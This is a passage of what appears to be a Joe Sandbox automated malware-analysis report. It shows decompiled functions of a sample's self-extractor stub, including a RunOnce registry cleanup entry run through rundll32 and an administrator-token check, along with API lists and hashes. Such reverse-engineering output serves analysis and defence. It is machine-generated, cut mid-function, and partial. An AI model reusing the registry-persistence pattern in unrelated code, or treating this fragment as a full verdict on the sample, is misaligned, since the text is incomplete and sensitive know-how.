                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,?,0000000C), ref: 00DE68F4
                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegCloseKey.ADVAPI32(?), ref: 00DE6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: 563f751b40ad63a0d79c594182f307d38ca5ee36ca1b3fb5255dad1246237cfc
                                                                                                                                                                                                        • Instruction ID: 79bec973d97764ad85a986815d32f05c7f8d7b281e7b6db99a87ea44cc8c0bdf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 563f751b40ad63a0d79c594182f307d38ca5ee36ca1b3fb5255dad1246237cfc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7510572A00296AFDB21BF2ACC88BAA7B69EF45300F144198FD49A7241DB31DD05CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00DE1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00DE658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00DE658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xde1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00DE1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x00de2773
                                                                                                                                                                                                        0x00de277e
                                                                                                                                                                                                        0x00de2785
                                                                                                                                                                                                        0x00de278a
                                                                                                                                                                                                        0x00de278d
                                                                                                                                                                                                        0x00de2790
                                                                                                                                                                                                        0x00de2792
                                                                                                                                                                                                        0x00de2798
                                                                                                                                                                                                        0x00de279d
                                                                                                                                                                                                        0x00de28b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de27a3
                                                                                                                                                                                                        0x00de27a3
                                                                                                                                                                                                        0x00de27af
                                                                                                                                                                                                        0x00de27c2
                                                                                                                                                                                                        0x00de27c8
                                                                                                                                                                                                        0x00de27cd
                                                                                                                                                                                                        0x00de27d5
                                                                                                                                                                                                        0x00de28b7
                                                                                                                                                                                                        0x00de28b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de27db
                                                                                                                                                                                                        0x00de27dd
                                                                                                                                                                                                        0x00de28aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de27e3
                                                                                                                                                                                                        0x00de27e3
                                                                                                                                                                                                        0x00de27ec
                                                                                                                                                                                                        0x00de27f8
                                                                                                                                                                                                        0x00de2803
                                                                                                                                                                                                        0x00de280b
                                                                                                                                                                                                        0x00de2831
                                                                                                                                                                                                        0x00de28c3
                                                                                                                                                                                                        0x00de28c9
                                                                                                                                                                                                        0x00de28cd
                                                                                                                                                                                                        0x00de2837
                                                                                                                                                                                                        0x00de285a
                                                                                                                                                                                                        0x00de285c
                                                                                                                                                                                                        0x00de2865
                                                                                                                                                                                                        0x00de2892
                                                                                                                                                                                                        0x00de2895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2867
                                                                                                                                                                                                        0x00de2878
                                                                                                                                                                                                        0x00de288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de287a
                                                                                                                                                                                                        0x00de2880
                                                                                                                                                                                                        0x00de2885
                                                                                                                                                                                                        0x00de2897
                                                                                                                                                                                                        0x00de2899
                                                                                                                                                                                                        0x00de2899
                                                                                                                                                                                                        0x00de2878
                                                                                                                                                                                                        0x00de2865
                                                                                                                                                                                                        0x00de28a0
                                                                                                                                                                                                        0x00de28bf
                                                                                                                                                                                                        0x00de28c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de28c1
                                                                                                                                                                                                        0x00de2831
                                                                                                                                                                                                        0x00de27dd
                                                                                                                                                                                                        0x00de27d5
                                                                                                                                                                                                        0x00de28e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(B4DD4FDF,00000000,00000000,00000000), ref: 00DE27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00DE27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00DE27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00DE28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00DE27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: a5f2ac8d7f89aabb3a3ed6c74837a5560af6b849d060890bf2b4c434cbd1f9e1
                                                                                                                                                                                                        • Instruction ID: 26cd7aa68e16ccdb9d816667f6c9a1fc5b151f158e1e20abd70e8465bdffb520
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5f2ac8d7f89aabb3a3ed6c74837a5560af6b849d060890bf2b4c434cbd1f9e1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41A271A002ACAFDB24BB659CC5AFE7BBDEB55700F0440A9F549D2204DB709E858FB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00DE2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xde8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00DE658A( &_v268, 0x104, 0xde1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        							E00DE171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00de2272
                                                                                                                                                                                                        0x00de2277
                                                                                                                                                                                                        0x00de2279
                                                                                                                                                                                                        0x00de2283
                                                                                                                                                                                                        0x00de2289
                                                                                                                                                                                                        0x00de22ab
                                                                                                                                                                                                        0x00de22b1
                                                                                                                                                                                                        0x00de22c4
                                                                                                                                                                                                        0x00de22e0
                                                                                                                                                                                                        0x00de22e6
                                                                                                                                                                                                        0x00de22f5
                                                                                                                                                                                                        0x00de230d
                                                                                                                                                                                                        0x00de231c
                                                                                                                                                                                                        0x00de231c
                                                                                                                                                                                                        0x00de2321
                                                                                                                                                                                                        0x00de233a
                                                                                                                                                                                                        0x00de2342
                                                                                                                                                                                                        0x00de2348
                                                                                                                                                                                                        0x00de234b
                                                                                                                                                                                                        0x00de234c
                                                                                                                                                                                                        0x00de234c
                                                                                                                                                                                                        0x00de234e
                                                                                                                                                                                                        0x00de234f
                                                                                                                                                                                                        0x00de236e
                                                                                                                                                                                                        0x00de236e
                                                                                                                                                                                                        0x00de237a
                                                                                                                                                                                                        0x00de2380
                                                                                                                                                                                                        0x00de2380
                                                                                                                                                                                                        0x00de2381
                                                                                                                                                                                                        0x00de2381
                                                                                                                                                                                                        0x00de238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00DE22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00DE22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00DE236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00DE237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE2321
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00DE232D
                                                                                                                                                                                                        • wextract_cleanup3, xrefs: 00DE227C, 00DE22CD, 00DE2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00DE2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 3027380567-2228382463
                                                                                                                                                                                                        • Opcode ID: 5cb4a86614b1ed7a7429f69a392ac55054dcc7c2a1ebd3e837bf941ed028174d
                                                                                                                                                                                                        • Instruction ID: 5226c95abbcb9bc541b4a2e40042fce832e13bf7f1641591bf2322cb9f7dd134
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cb4a86614b1ed7a7429f69a392ac55054dcc7c2a1ebd3e837bf941ed028174d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2031C871A003986BDB21BB56DC89FEA7B7CEB14740F0401E9B50DEA151DA71AF88CE70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00DE3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xde8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xde8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00DE43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xde8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xde88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00DE30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00de3108
                                                                                                                                                                                                        0x00de310b
                                                                                                                                                                                                        0x00de31b7
                                                                                                                                                                                                        0x00de31ca
                                                                                                                                                                                                        0x00de31d0
                                                                                                                                                                                                        0x00de31d0
                                                                                                                                                                                                        0x00de31da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de31da
                                                                                                                                                                                                        0x00de3111
                                                                                                                                                                                                        0x00de3114
                                                                                                                                                                                                        0x00de3136
                                                                                                                                                                                                        0x00de3136
                                                                                                                                                                                                        0x00de3138
                                                                                                                                                                                                        0x00de313b
                                                                                                                                                                                                        0x00de3141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3143
                                                                                                                                                                                                        0x00de3116
                                                                                                                                                                                                        0x00de311b
                                                                                                                                                                                                        0x00de314b
                                                                                                                                                                                                        0x00de3151
                                                                                                                                                                                                        0x00de3158
                                                                                                                                                                                                        0x00de316a
                                                                                                                                                                                                        0x00de3176
                                                                                                                                                                                                        0x00de317d
                                                                                                                                                                                                        0x00de318b
                                                                                                                                                                                                        0x00de319e
                                                                                                                                                                                                        0x00de31a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de31ad
                                                                                                                                                                                                        0x00de3120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de312a
                                                                                                                                                                                                        0x00de3134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3134
                                                                                                                                                                                                        0x00de312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00DE316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00DE317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00DE3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00DE3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00DE30C0), ref: 00DE31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00DE31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 512e4f170e5b94243d205b898023a9dbe2d422e3ce3f8c7deb31cfb9bdc3c7b3
                                                                                                                                                                                                        • Instruction ID: 6deb667a0cf55196f4c47ffb552bc7caff76804e1b10bc22e89e8d184a3e0a1b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 512e4f170e5b94243d205b898023a9dbe2d422e3ce3f8c7deb31cfb9bdc3c7b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11E4316043D2BFDB117F299C8CB6A3A64EB46721F050618F925EA2E0DB70A641D776
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00DE18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xde8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00DE6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00DE17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xde8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
